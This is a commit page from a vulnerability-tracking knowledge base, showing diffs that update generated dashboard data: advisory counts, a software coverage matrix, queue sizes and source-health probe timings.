hao/websafe-kb
1
0
派生 0
代码 工单 合并请求 1 工作流 软件包 项目 发布 百科 活动

更新: 413 个文件 - 2026-03-24 03:45:07

浏览代码
这个提交包含在:
hao
2026-03-24 03:45:08 -07:00
父节点 cd808b4358
当前提交 1e447fe97f
修改 413 个文件,包含 23191 行新增9255 行删除
下载 Patch 文件 下载 Diff 文件 展开所有文件 折叠所有文件

6
08-threat-intel/generated/coverage-matrix.md
查看文件

@@ -25,14 +25,14 @@
| GitLab CE | `platforms` | `rolling-24m` | `-` | `yes` | `55` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
| Grafana | `platforms` | `rolling-24m` | `-` | `yes` | `60` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
| Hapi | `frameworks` | `history-full` | `yes` | `yes` | `1` | `1` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2020-08-31T19:00:56Z` |
| HAProxy | `servers` | `rolling-24m` | `-` | `yes` | `6` | `0` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `Wed, 25 Feb 2026 14:00:00 +0000` |
| HAProxy | `servers` | `rolling-24m` | `-` | `yes` | `7` | `0` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `1` | `Wed, 25 Feb 2026 14:00:00 +0000` |
| Jenkins | `platforms` | `rolling-24m` | `-` | `yes` | `60` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
| Joomla | `cms` | `history-full` | `yes` | `yes` | `100` | `0` | `4` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2025-04-03T01:03:51.193` |
| Kibana | `platforms` | `rolling-24m` | `-` | `yes` | `47` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `6` | `Thu, 19 Mar 2026 16:59:58 +0000` |
| Koa | `frameworks` | `rolling-24m` | `-` | `yes` | `1` | `1` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2026-02-26T23:36:36.294040Z` |
| Laravel | `frameworks` | `rolling-24m` | `-` | `yes` | `2` | `2` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2026-03-13T22:15:34.333730Z` |
| Magento Open Source | `ecommerce` | `history-full` | `yes` | `yes` | `89` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2025-04-20T01:37:25.860` |
| Mattermost | `platforms` | `rolling-24m` | `-` | `yes` | `21` | `21` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `Fix Release Date` |
| Mattermost | `platforms` | `rolling-24m` | `-` | `yes` | `31` | `31` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `Fix Release Date` |
| MediaWiki | `cms` | `rolling-24m` | `-` | `yes` | `70` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `70` | `Wed, 22 Oct 2025 21:44:43 +0000` |
| Medusa | `ecommerce` | `rolling-24m` | `-` | `yes` | `15` | `0` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `15` | `` |
| Moodle | `cms` | `rolling-24m` | `-` | `yes` | `40` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `40` | `2025-04-09T00:30:58.490` |
@@ -56,7 +56,7 @@
| Strapi | `cms` | `rolling-24m` | `-` | `yes` | `26` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `26` | `` |
| SvelteKit | `frameworks` | `rolling-24m` | `-` | `yes` | `3` | `3` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2026-02-28T06:27:26.115188Z` |
| Symfony | `frameworks` | `rolling-24m` | `-` | `yes` | `9` | `9` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2026-03-13T22:16:14.858636Z` |
| Traefik | `servers` | `rolling-24m` | `-` | `yes` | `45` | `0` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `27` | `2026-03-23T04:53:13.381024Z` |
| Traefik | `servers` | `rolling-24m` | `-` | `yes` | `45` | `0` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `27` | `2026-03-23T18:56:07.286130Z` |
| Undici | `frameworks` | `rolling-24m` | `-` | `yes` | `16` | `15` | `2` | `seeded` | `real:7/synthetic:0/blocked:0` | `0` | `7` | `1` | `2026-03-18T23:58:57.714731Z` |
| Vite | `frameworks` | `history-full` | `yes` | `yes` | `42` | `16` | `3` | `seeded` | `real:12/synthetic:0/blocked:0` | `12` | `12` | `26` | `2026-02-04T04:37:24.129476Z` |
| Vue | `frameworks` | `history-full` | `yes` | `yes` | `15` | `1` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `14` | `2024-10-24T19:12:14.925352Z` |

2672
08-threat-intel/generated/dashboard/advisories.json
查看文件

文件差异因一行或多行过长而隐藏

12
08-threat-intel/generated/dashboard/architecture.json
查看文件

@@ -1,5 +1,5 @@
{
"generated_at": "2026-03-23T09:54:11+00:00",
"generated_at": "2026-03-24T09:18:20+00:00",
"title": "\u5f53\u524d\u67b6\u6784\u5e93",
"summary": "\u5de5\u4f5c\u53f0\u3001\u63a7\u5236\u9762\u3001\u6570\u636e\u5c42\u3001\u6388\u6743\u8fb9\u754c\u4e0e\u7cfb\u7edf\u8986\u76d6\u7684\u5f53\u524d\u771f\u503c\u89c6\u56fe\u3002",
"sections": [
@@ -39,7 +39,7 @@
},
{
"label": "\u5f53\u524d\u6f0f\u6d1e\u6761\u76ee",
"value": "2404"
"value": "2415"
}
],
"fields": [
@@ -57,7 +57,7 @@
},
{
"label": "\u751f\u6210\u65f6\u95f4",
"value": "2026-03-23T09:54:11+00:00"
"value": "2026-03-24T09:18:20+00:00"
}
],
"links": [
@@ -5973,7 +5973,7 @@
},
{
"label": "Advisory \u6570",
"value": "2404"
"value": "2415"
},
{
"label": "\u72b6\u6001\u7c7b\u578b",
@@ -5992,7 +5992,7 @@
"items": [
{
"title": "\u4eba\u5de5\u5206\u8bca",
"summary": "\u5f53\u524d\u7d2f\u8ba1 2315 \u6761\u3002",
"summary": "\u5f53\u524d\u7d2f\u8ba1 2326 \u6761\u3002",
"open": false,
"fields": [
{
@@ -6001,7 +6001,7 @@
},
{
"label": "\u6570\u91cf",
"value": "2315"
"value": "2326"
}
]
},

47
08-threat-intel/generated/dashboard/data/completeness.json
查看文件

@@ -1,7 +1,7 @@
{
"generated_at": "2026-03-23T09:54:11+00:00",
"generated_at": "2026-03-24T09:18:20+00:00",
"advisory_total": 89,
"registry_advisory_total": 2404,
"registry_advisory_total": 2415,
"scope": "latest-run-backed-advisories",
"latest_statuses": {
"verified-real": 89
@@ -175,12 +175,12 @@
"active_source_count": 102,
"green_source_count": 102,
"failure_count": 0,
"last_fully_green_run": "2026-03-23T09:53:46+00:00",
"last_fully_green_run": "2026-03-24T09:17:44+00:00",
"open_alert_count": 0,
"resolved_alert_count": 101
},
"entity_coverage": {
"generated_at": "2026-03-23T09:54:10+00:00",
"generated_at": "2026-03-24T09:18:19+00:00",
"cataloged_entity_total": 109,
"candidate_entity_total": 7,
"history_full_complete_count": 40,
@@ -990,10 +990,18 @@
"entity_id": "mattermost--project--mattermost-server",
"entity_type": "project",
"display_name": "Mattermost Server",
"advisory_count": 14,
"advisory_count": 13,
"history_backfill_status": "complete",
"latest_sync_status": "green"
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"display_name": "mattermost / mattermost-server",
"advisory_count": 12,
"history_backfill_status": "seeded",
"latest_sync_status": "green"
},
{
"entity_id": "mattermost--plugin--mattermost-plugins",
"entity_type": "plugin",
@@ -1009,14 +1017,6 @@
"advisory_count": 1,
"history_backfill_status": "seeded",
"latest_sync_status": "green"
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"display_name": "mattermost / mattermost-server",
"advisory_count": 1,
"history_backfill_status": "seeded",
"latest_sync_status": "green"
}
],
"backlog_preview": []
@@ -1941,28 +1941,29 @@
"discovery_queue": 7,
"history_queue": 27,
"latest_queue": 10,
"workflow_queue": 2176
"workflow_queue": 2177
}
},
"monitor_summary": {
"generated_at": "2026-03-23T09:53:46+00:00",
"generated_at": "2026-03-24T09:17:44+00:00",
"active_source_count": 102,
"green_source_count": 102,
"source_failure_count": 0,
"open_alert_count": 0,
"resolved_alert_count": 101,
"last_fully_green_run": "2026-03-23T09:53:46+00:00",
"last_fully_green_run": "2026-03-24T09:17:44+00:00",
"source_catalog": {
"system_count": 62,
"source_count": 179,
"retired_source_count": 77
},
"ingest": {
"new_count": 2,
"updated_count": 5,
"new_count": 11,
"updated_count": 4,
"failure_count": 0,
"systems_touched": [
"caddy",
"haproxy",
"mattermost",
"traefik"
]
},
@@ -1983,14 +1984,14 @@
"cataloged_entity_total": 109,
"latest_version_synced_count": 94,
"source_gap_count": 15,
"security_version_total": 6180,
"security_version_total": 6242,
"security_version_entity_count": 82,
"auto_promoted_entity_count": 10,
"lab_enqueued_count": 2
"lab_enqueued_count": 11
},
"lab_enqueue": {
"enqueued": 2,
"queue_total": 2360,
"enqueued": 11,
"queue_total": 2371,
"pending_count": 0
}
},

22
08-threat-intel/generated/dashboard/data/entity-completeness.json
查看文件

@@ -1,5 +1,5 @@
{
"generated_at": "2026-03-23T09:54:10+00:00",
"generated_at": "2026-03-24T09:18:19+00:00",
"cataloged_entity_total": 109,
"candidate_entity_total": 7,
"history_full_complete_count": 40,
@@ -809,10 +809,18 @@
"entity_id": "mattermost--project--mattermost-server",
"entity_type": "project",
"display_name": "Mattermost Server",
"advisory_count": 14,
"advisory_count": 13,
"history_backfill_status": "complete",
"latest_sync_status": "green"
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"display_name": "mattermost / mattermost-server",
"advisory_count": 12,
"history_backfill_status": "seeded",
"latest_sync_status": "green"
},
{
"entity_id": "mattermost--plugin--mattermost-plugins",
"entity_type": "plugin",
@@ -828,14 +836,6 @@
"advisory_count": 1,
"history_backfill_status": "seeded",
"latest_sync_status": "green"
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"display_name": "mattermost / mattermost-server",
"advisory_count": 1,
"history_backfill_status": "seeded",
"latest_sync_status": "green"
}
],
"backlog_preview": []
@@ -1760,6 +1760,6 @@
"discovery_queue": 7,
"history_queue": 27,
"latest_queue": 10,
"workflow_queue": 2176
"workflow_queue": 2177
}
}

4
08-threat-intel/generated/dashboard/data/entity-queues.json
查看文件

@@ -1,5 +1,5 @@
{
"generated_at": "2026-03-23T09:54:10+00:00",
"generated_at": "2026-03-24T09:18:19+00:00",
"discovery_queue": {
"count": 7,
"items": [
@@ -408,7 +408,7 @@
]
},
"workflow_queue": {
"count": 2176,
"count": 2177,
"items": [
{
"canonical_id": "adminer--CVE-2026-25878",

2947
08-threat-intel/generated/dashboard/data/lab-enqueue-summary.json
查看文件

文件差异内容过多而无法显示 加载差异

19
08-threat-intel/generated/dashboard/data/monitor-summary.json
查看文件

@@ -1,22 +1,23 @@
{
"generated_at": "2026-03-23T09:53:46+00:00",
"generated_at": "2026-03-24T09:17:44+00:00",
"active_source_count": 102,
"green_source_count": 102,
"source_failure_count": 0,
"open_alert_count": 0,
"resolved_alert_count": 101,
"last_fully_green_run": "2026-03-23T09:53:46+00:00",
"last_fully_green_run": "2026-03-24T09:17:44+00:00",
"source_catalog": {
"system_count": 62,
"source_count": 179,
"retired_source_count": 77
},
"ingest": {
"new_count": 2,
"updated_count": 5,
"new_count": 11,
"updated_count": 4,
"failure_count": 0,
"systems_touched": [
"caddy",
"haproxy",
"mattermost",
"traefik"
]
},
@@ -37,14 +38,14 @@
"cataloged_entity_total": 109,
"latest_version_synced_count": 94,
"source_gap_count": 15,
"security_version_total": 6180,
"security_version_total": 6242,
"security_version_entity_count": 82,
"auto_promoted_entity_count": 10,
"lab_enqueued_count": 2
"lab_enqueued_count": 11
},
"lab_enqueue": {
"enqueued": 2,
"queue_total": 2360,
"enqueued": 11,
"queue_total": 2371,
"pending_count": 0
}
}

1542
08-threat-intel/generated/dashboard/data/release-index.json
查看文件

文件差异内容过多而无法显示 加载差异

2
08-threat-intel/generated/dashboard/data/source-catalog-audit.json
查看文件

@@ -1,5 +1,5 @@
{
"generated_at": "2026-03-23T09:26:43+00:00",
"generated_at": "2026-03-24T09:17:05+00:00",
"system_count": 62,
"source_count": 179,
"active_source_count": 102,

288
08-threat-intel/generated/dashboard/data/source-health.json
查看文件

@@ -1,17 +1,17 @@
{
"generated_at": "2026-03-23T09:53:46+00:00",
"generated_at": "2026-03-24T09:17:44+00:00",
"active_source_count": 102,
"green_source_count": 102,
"failure_count": 0,
"all_green": true,
"last_fully_green_run": "2026-03-23T09:53:46+00:00",
"last_fully_green_run": "2026-03-24T09:17:44+00:00",
"retries_performed": 0,
"probes": [
{
"system_id": "adminer",
"source_name": "OSV Adminer",
"source_kind": "osv-batch",
"elapsed_seconds": 5.754,
"elapsed_seconds": 2.321,
"kind": "osv-batch",
"items_seen": 1
},
@@ -19,7 +19,7 @@
"system_id": "adobe-commerce",
"source_name": "Adobe Magento Security Index",
"source_kind": "vendor-index",
"elapsed_seconds": 0.028,
"elapsed_seconds": 0.029,
"kind": "vendor-index",
"items_seen": 46
},
@@ -27,7 +27,7 @@
"system_id": "angular",
"source_name": "OSV Angular",
"source_kind": "osv-batch",
"elapsed_seconds": 3.837,
"elapsed_seconds": 1.538,
"kind": "osv-batch",
"items_seen": 1
},
@@ -35,7 +35,7 @@
"system_id": "apache-httpd",
"source_name": "Apache HTTPD Security",
"source_kind": "html-links",
"elapsed_seconds": 3.3,
"elapsed_seconds": 1.611,
"kind": "html-links",
"items_seen": 182
},
@@ -43,7 +43,7 @@
"system_id": "apache-httpd",
"source_name": "CISA KEV Apache HTTPD",
"source_kind": "kev-json",
"elapsed_seconds": 4.396,
"elapsed_seconds": 1.7,
"kind": "kev-json",
"items_seen": 1551
},
@@ -51,7 +51,7 @@
"system_id": "apache-tomcat",
"source_name": "Apache Tomcat Security",
"source_kind": "html-links",
"elapsed_seconds": 3.608,
"elapsed_seconds": 1.614,
"kind": "html-links",
"items_seen": 270
},
@@ -59,7 +59,7 @@
"system_id": "apache-tomcat",
"source_name": "CISA KEV Tomcat",
"source_kind": "kev-json",
"elapsed_seconds": 4.382,
"elapsed_seconds": 1.728,
"kind": "kev-json",
"items_seen": 1551
},
@@ -67,7 +67,7 @@
"system_id": "aspnet-core",
"source_name": "OSV ASP.NET Core",
"source_kind": "osv-batch",
"elapsed_seconds": 5.42,
"elapsed_seconds": 2.176,
"kind": "osv-batch",
"items_seen": 1
},
@@ -75,7 +75,7 @@
"system_id": "astro",
"source_name": "OSV Astro",
"source_kind": "osv-batch",
"elapsed_seconds": 3.608,
"elapsed_seconds": 1.536,
"kind": "osv-batch",
"items_seen": 1
},
@@ -83,7 +83,7 @@
"system_id": "caddy",
"source_name": "OSV Caddy",
"source_kind": "osv-batch",
"elapsed_seconds": 5.339,
"elapsed_seconds": 2.207,
"kind": "osv-batch",
"items_seen": 1
},
@@ -91,7 +91,7 @@
"system_id": "directus",
"source_name": "Directus GitHub Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.034,
"elapsed_seconds": 0.049,
"kind": "html-links",
"items_seen": 127
},
@@ -99,7 +99,7 @@
"system_id": "directus",
"source_name": "OSV Directus",
"source_kind": "osv-batch",
"elapsed_seconds": 1.656,
"elapsed_seconds": 0.954,
"kind": "osv-batch",
"items_seen": 1
},
@@ -115,7 +115,7 @@
"system_id": "discourse",
"source_name": "Discourse Security RSS",
"source_kind": "rss-feed",
"elapsed_seconds": 0.03,
"elapsed_seconds": 0.029,
"kind": "rss-feed",
"items_seen": 3
},
@@ -123,7 +123,7 @@
"system_id": "discourse",
"source_name": "OSV Discourse",
"source_kind": "osv-batch",
"elapsed_seconds": 1.516,
"elapsed_seconds": 0.824,
"kind": "osv-batch",
"items_seen": 1
},
@@ -131,7 +131,7 @@
"system_id": "django",
"source_name": "Django Security Releases Archive",
"source_kind": "vendor-index",
"elapsed_seconds": 2.863,
"elapsed_seconds": 1.532,
"kind": "vendor-index",
"items_seen": 1276
},
@@ -139,7 +139,7 @@
"system_id": "django",
"source_name": "Django Security Weblog",
"source_kind": "vendor-index",
"elapsed_seconds": 2.84,
"elapsed_seconds": 1.508,
"kind": "vendor-index",
"items_seen": 332
},
@@ -147,7 +147,7 @@
"system_id": "django",
"source_name": "OSV Django",
"source_kind": "osv-batch",
"elapsed_seconds": 5.346,
"elapsed_seconds": 3.099,
"kind": "osv-batch",
"items_seen": 1
},
@@ -155,7 +155,7 @@
"system_id": "drupal",
"source_name": "Drupal Security Advisories RSS",
"source_kind": "rss-feed",
"elapsed_seconds": 0.038,
"elapsed_seconds": 0.051,
"kind": "rss-feed",
"items_seen": 20
},
@@ -163,7 +163,7 @@
"system_id": "drupal",
"source_name": "OSV Drupal",
"source_kind": "osv-batch",
"elapsed_seconds": 2.965,
"elapsed_seconds": 1.795,
"kind": "osv-batch",
"items_seen": 1
},
@@ -171,7 +171,7 @@
"system_id": "echo",
"source_name": "OSV Echo",
"source_kind": "osv-batch",
"elapsed_seconds": 4.843,
"elapsed_seconds": 2.15,
"kind": "osv-batch",
"items_seen": 1
},
@@ -179,7 +179,7 @@
"system_id": "esbuild",
"source_name": "OSV esbuild",
"source_kind": "osv-batch",
"elapsed_seconds": 3.612,
"elapsed_seconds": 1.611,
"kind": "osv-batch",
"items_seen": 1
},
@@ -187,7 +187,7 @@
"system_id": "express",
"source_name": "OSV Express",
"source_kind": "osv-batch",
"elapsed_seconds": 3.3,
"elapsed_seconds": 1.536,
"kind": "osv-batch",
"items_seen": 1
},
@@ -195,7 +195,7 @@
"system_id": "fastify",
"source_name": "OSV Fastify",
"source_kind": "osv-batch",
"elapsed_seconds": 3.056,
"elapsed_seconds": 1.551,
"kind": "osv-batch",
"items_seen": 1
},
@@ -203,7 +203,7 @@
"system_id": "flask",
"source_name": "OSV Flask",
"source_kind": "osv-batch",
"elapsed_seconds": 4.622,
"elapsed_seconds": 2.195,
"kind": "osv-batch",
"items_seen": 1
},
@@ -211,7 +211,7 @@
"system_id": "ghost",
"source_name": "Ghost GitHub Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.037,
"elapsed_seconds": 0.051,
"kind": "html-links",
"items_seen": 119
},
@@ -219,7 +219,7 @@
"system_id": "ghost",
"source_name": "OSV Ghost",
"source_kind": "osv-batch",
"elapsed_seconds": 2.059,
"elapsed_seconds": 0.956,
"kind": "osv-batch",
"items_seen": 1
},
@@ -227,7 +227,7 @@
"system_id": "gin",
"source_name": "OSV Gin",
"source_kind": "osv-batch",
"elapsed_seconds": 4.398,
"elapsed_seconds": 2.154,
"kind": "osv-batch",
"items_seen": 1
},
@@ -235,7 +235,7 @@
"system_id": "gitea",
"source_name": "OSV Gitea",
"source_kind": "osv-batch",
"elapsed_seconds": 5.337,
"elapsed_seconds": 2.382,
"kind": "osv-batch",
"items_seen": 1
},
@@ -243,7 +243,7 @@
"system_id": "gitlab-ce",
"source_name": "GitLab Advisory Database",
"source_kind": "html-links",
"elapsed_seconds": 3.842,
"elapsed_seconds": 1.737,
"kind": "html-links",
"items_seen": 5
},
@@ -251,7 +251,7 @@
"system_id": "gitlab-ce",
"source_name": "GitLab Security Releases Atom",
"source_kind": "atom-feed",
"elapsed_seconds": 3.842,
"elapsed_seconds": 1.737,
"kind": "atom-feed",
"items_seen": 186
},
@@ -259,7 +259,7 @@
"system_id": "grafana",
"source_name": "CISA KEV Grafana",
"source_kind": "kev-json",
"elapsed_seconds": 4.395,
"elapsed_seconds": 1.738,
"kind": "kev-json",
"items_seen": 1551
},
@@ -267,7 +267,7 @@
"system_id": "grafana",
"source_name": "Grafana Security Advisories",
"source_kind": "html-links",
"elapsed_seconds": 3.842,
"elapsed_seconds": 1.737,
"kind": "html-links",
"items_seen": 159
},
@@ -275,7 +275,7 @@
"system_id": "hapi",
"source_name": "OSV Hapi",
"source_kind": "osv-batch",
"elapsed_seconds": 2.84,
"elapsed_seconds": 1.744,
"kind": "osv-batch",
"items_seen": 1
},
@@ -283,7 +283,7 @@
"system_id": "haproxy",
"source_name": "HAProxy Blog Feed",
"source_kind": "rss-feed",
"elapsed_seconds": 3.618,
"elapsed_seconds": 1.7,
"kind": "rss-feed",
"items_seen": 10
},
@@ -291,7 +291,7 @@
"system_id": "jenkins",
"source_name": "Jenkins Security Advisories RSS",
"source_kind": "rss-feed",
"elapsed_seconds": 3.842,
"elapsed_seconds": 1.737,
"kind": "rss-feed",
"items_seen": 96
},
@@ -299,7 +299,7 @@
"system_id": "joomla",
"source_name": "Joomla Security Centre",
"source_kind": "html-links",
"elapsed_seconds": 0.038,
"elapsed_seconds": 0.051,
"kind": "html-links",
"items_seen": 139
},
@@ -307,7 +307,7 @@
"system_id": "joomla",
"source_name": "OSV Joomla",
"source_kind": "osv-batch",
"elapsed_seconds": 1.648,
"elapsed_seconds": 0.899,
"kind": "osv-batch",
"items_seen": 1
},
@@ -315,7 +315,7 @@
"system_id": "kibana",
"source_name": "Elastic Product Security",
"source_kind": "html-links",
"elapsed_seconds": 4.01,
"elapsed_seconds": 1.738,
"kind": "html-links",
"items_seen": 66
},
@@ -323,7 +323,7 @@
"system_id": "kibana",
"source_name": "NVD Kibana",
"source_kind": "nvd-search",
"elapsed_seconds": 6.119,
"elapsed_seconds": 3.279,
"kind": "nvd-search",
"items_seen": 1
},
@@ -331,7 +331,7 @@
"system_id": "koa",
"source_name": "OSV Koa",
"source_kind": "osv-batch",
"elapsed_seconds": 2.84,
"elapsed_seconds": 1.535,
"kind": "osv-batch",
"items_seen": 1
},
@@ -339,7 +339,7 @@
"system_id": "laravel",
"source_name": "OSV Laravel",
"source_kind": "osv-batch",
"elapsed_seconds": 3.633,
"elapsed_seconds": 2.335,
"kind": "osv-batch",
"items_seen": 1
},
@@ -347,7 +347,7 @@
"system_id": "magento-open-source",
"source_name": "Magento GitHub Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.02,
"elapsed_seconds": 0.022,
"kind": "html-links",
"items_seen": 99
},
@@ -355,7 +355,7 @@
"system_id": "magento-open-source",
"source_name": "OSV Magento Open Source",
"source_kind": "osv-batch",
"elapsed_seconds": 1.648,
"elapsed_seconds": 0.855,
"kind": "osv-batch",
"items_seen": 1
},
@@ -363,7 +363,7 @@
"system_id": "magento-open-source",
"source_name": "Sansec Research",
"source_kind": "html-links",
"elapsed_seconds": 0.02,
"elapsed_seconds": 0.022,
"kind": "html-links",
"items_seen": 134
},
@@ -371,7 +371,7 @@
"system_id": "mattermost",
"source_name": "Mattermost Security Updates JSON",
"source_kind": "json-feed",
"elapsed_seconds": 4.201,
"elapsed_seconds": 1.742,
"kind": "json-feed",
"items_seen": 594
},
@@ -379,7 +379,7 @@
"system_id": "mattermost",
"source_name": "OSV Mattermost",
"source_kind": "osv-batch",
"elapsed_seconds": 6.79,
"elapsed_seconds": 3.206,
"kind": "osv-batch",
"items_seen": 1
},
@@ -387,7 +387,7 @@
"system_id": "mediawiki",
"source_name": "MediaWiki Announce RSS",
"source_kind": "rss-feed",
"elapsed_seconds": 0.033,
"elapsed_seconds": 0.048,
"kind": "rss-feed",
"items_seen": 30
},
@@ -395,7 +395,7 @@
"system_id": "mediawiki",
"source_name": "OSV MediaWiki",
"source_kind": "osv-batch",
"elapsed_seconds": 1.657,
"elapsed_seconds": 1.007,
"kind": "osv-batch",
"items_seen": 1
},
@@ -403,7 +403,7 @@
"system_id": "medusa",
"source_name": "OSV Medusa",
"source_kind": "osv-batch",
"elapsed_seconds": 1.493,
"elapsed_seconds": 0.852,
"kind": "osv-batch",
"items_seen": 1
},
@@ -411,7 +411,7 @@
"system_id": "moodle",
"source_name": "OSV Moodle",
"source_kind": "osv-batch",
"elapsed_seconds": 4.487,
"elapsed_seconds": 3.854,
"kind": "osv-batch",
"items_seen": 1
},
@@ -419,7 +419,7 @@
"system_id": "nestjs",
"source_name": "OSV NestJS",
"source_kind": "osv-batch",
"elapsed_seconds": 2.84,
"elapsed_seconds": 1.535,
"kind": "osv-batch",
"items_seen": 1
},
@@ -427,7 +427,7 @@
"system_id": "nextjs",
"source_name": "OSV Next.js",
"source_kind": "osv-batch",
"elapsed_seconds": 2.255,
"elapsed_seconds": 0.918,
"kind": "osv-batch",
"items_seen": 1
},
@@ -435,7 +435,7 @@
"system_id": "nginx",
"source_name": "CISA KEV NGINX",
"source_kind": "kev-json",
"elapsed_seconds": 4.382,
"elapsed_seconds": 1.7,
"kind": "kev-json",
"items_seen": 1551
},
@@ -443,7 +443,7 @@
"system_id": "nginx",
"source_name": "NGINX Security Advisories",
"source_kind": "html-links",
"elapsed_seconds": 3.293,
"elapsed_seconds": 1.551,
"kind": "html-links",
"items_seen": 138
},
@@ -451,7 +451,7 @@
"system_id": "nodejs",
"source_name": "CISA KEV Node.js",
"source_kind": "kev-json",
"elapsed_seconds": 4.382,
"elapsed_seconds": 1.728,
"kind": "kev-json",
"items_seen": 1551
},
@@ -459,15 +459,15 @@
"system_id": "nodejs",
"source_name": "Node.js Security Releases",
"source_kind": "html-links",
"elapsed_seconds": 1.723,
"elapsed_seconds": 0.906,
"kind": "html-links",
"items_seen": 74
"items_seen": 73
},
{
"system_id": "nuxt",
"source_name": "OSV Nuxt",
"source_kind": "osv-batch",
"elapsed_seconds": 3.294,
"elapsed_seconds": 1.452,
"kind": "osv-batch",
"items_seen": 1
},
@@ -475,7 +475,7 @@
"system_id": "opencart",
"source_name": "OSV OpenCart",
"source_kind": "osv-batch",
"elapsed_seconds": 2.259,
"elapsed_seconds": 0.887,
"kind": "osv-batch",
"items_seen": 1
},
@@ -483,7 +483,7 @@
"system_id": "opencart",
"source_name": "OpenCart Releases",
"source_kind": "html-links",
"elapsed_seconds": 0.006,
"elapsed_seconds": 0.012,
"kind": "html-links",
"items_seen": 1500
},
@@ -491,7 +491,7 @@
"system_id": "openmage",
"source_name": "OSV OpenMage",
"source_kind": "osv-batch",
"elapsed_seconds": 1.636,
"elapsed_seconds": 0.93,
"kind": "osv-batch",
"items_seen": 1
},
@@ -499,7 +499,7 @@
"system_id": "openmage",
"source_name": "OpenMage GitHub Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.017,
"elapsed_seconds": 0.019,
"kind": "html-links",
"items_seen": 125
},
@@ -507,7 +507,7 @@
"system_id": "phpmyadmin",
"source_name": "OSV phpMyAdmin",
"source_kind": "osv-batch",
"elapsed_seconds": 5.654,
"elapsed_seconds": 2.616,
"kind": "osv-batch",
"items_seen": 1
},
@@ -515,7 +515,7 @@
"system_id": "phpmyadmin",
"source_name": "phpMyAdmin Security Page",
"source_kind": "html-links",
"elapsed_seconds": 3.618,
"elapsed_seconds": 1.7,
"kind": "html-links",
"items_seen": 263
},
@@ -523,7 +523,7 @@
"system_id": "prestashop",
"source_name": "Friends Of Presta Security",
"source_kind": "html-links",
"elapsed_seconds": 0.012,
"elapsed_seconds": 0.014,
"kind": "html-links",
"items_seen": 38
},
@@ -531,7 +531,7 @@
"system_id": "prestashop",
"source_name": "GitHub PrestaShop Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.011,
"elapsed_seconds": 0.015,
"kind": "html-links",
"items_seen": 127
},
@@ -539,7 +539,7 @@
"system_id": "prestashop",
"source_name": "OSV PrestaShop",
"source_kind": "osv-batch",
"elapsed_seconds": 1.734,
"elapsed_seconds": 0.919,
"kind": "osv-batch",
"items_seen": 1
},
@@ -547,7 +547,7 @@
"system_id": "prestashop",
"source_name": "PrestaShop Security Page",
"source_kind": "html-links",
"elapsed_seconds": 0.011,
"elapsed_seconds": 0.015,
"kind": "html-links",
"items_seen": 60
},
@@ -555,7 +555,7 @@
"system_id": "rails",
"source_name": "OSV Rails",
"source_kind": "osv-batch",
"elapsed_seconds": 4.201,
"elapsed_seconds": 2.182,
"kind": "osv-batch",
"items_seen": 1
},
@@ -563,7 +563,7 @@
"system_id": "react",
"source_name": "OSV React",
"source_kind": "osv-batch",
"elapsed_seconds": 1.949,
"elapsed_seconds": 0.873,
"kind": "osv-batch",
"items_seen": 1
},
@@ -571,7 +571,7 @@
"system_id": "redmine",
"source_name": "OSV Redmine",
"source_kind": "osv-batch",
"elapsed_seconds": 5.985,
"elapsed_seconds": 2.275,
"kind": "osv-batch",
"items_seen": 1
},
@@ -579,7 +579,7 @@
"system_id": "redmine",
"source_name": "Redmine Security Advisories",
"source_kind": "html-links",
"elapsed_seconds": 4.382,
"elapsed_seconds": 1.744,
"kind": "html-links",
"items_seen": 371
},
@@ -587,7 +587,7 @@
"system_id": "saleor",
"source_name": "GitHub Saleor Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.005,
"elapsed_seconds": 0.006,
"kind": "html-links",
"items_seen": 120
},
@@ -595,7 +595,7 @@
"system_id": "saleor",
"source_name": "OSV Saleor",
"source_kind": "osv-batch",
"elapsed_seconds": 1.493,
"elapsed_seconds": 0.881,
"kind": "osv-batch",
"items_seen": 1
},
@@ -603,7 +603,7 @@
"system_id": "shopware",
"source_name": "OSV Shopware",
"source_kind": "osv-batch",
"elapsed_seconds": 1.731,
"elapsed_seconds": 1.146,
"kind": "osv-batch",
"items_seen": 1
},
@@ -611,7 +611,7 @@
"system_id": "shopware",
